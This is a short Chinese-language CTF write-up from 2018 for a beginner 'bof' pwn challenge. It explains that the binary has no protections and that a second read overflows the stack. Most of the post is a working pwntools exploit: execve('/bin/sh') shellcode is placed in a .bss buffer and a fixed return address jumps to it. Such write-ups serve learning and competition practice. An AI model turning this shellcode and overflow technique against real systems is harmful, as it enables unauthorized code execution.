[Pwn]bof xp0int Posted on Oct 28 2018 # bof <br> 一道最基本的溢出题。 先看一下开启了什么保护。什么都没开随便玩 ![](https://leanote.com/api/file/getImage?fileId=5bd3e651ab64411fb800238b) <br> 放入ida中,逻辑很简单,首先读取一段数据到NAME中,NAME在bss段。 然后fun函数,在读取一段数据,这里的读取存在栈溢出。 ![](https://leanote.com/api/file/getImage?fileId=5bd3e651ab64411fb800238a) ![](https://leanote.com/api/file/getImage?fileId=5bd3e651ab64411fb800238c) <br> 所以我们可以在第一处读取shellcode,第二处溢出时修改返回值,跳到shellcode处执行。 ```python from pwn import * # context.log_level = 'DEBUG' sc = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" p = process('./bof') # p = remote('35.221.144.41',10000) p.recvuntil(':') p.send(sc.ljust(24)) p.recvuntil('(*_*)') p.send(cyclic(40) + p64(0x404070)) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Misc]bitcoin_base [Misc]加密了吗
没有帐号? 立即注册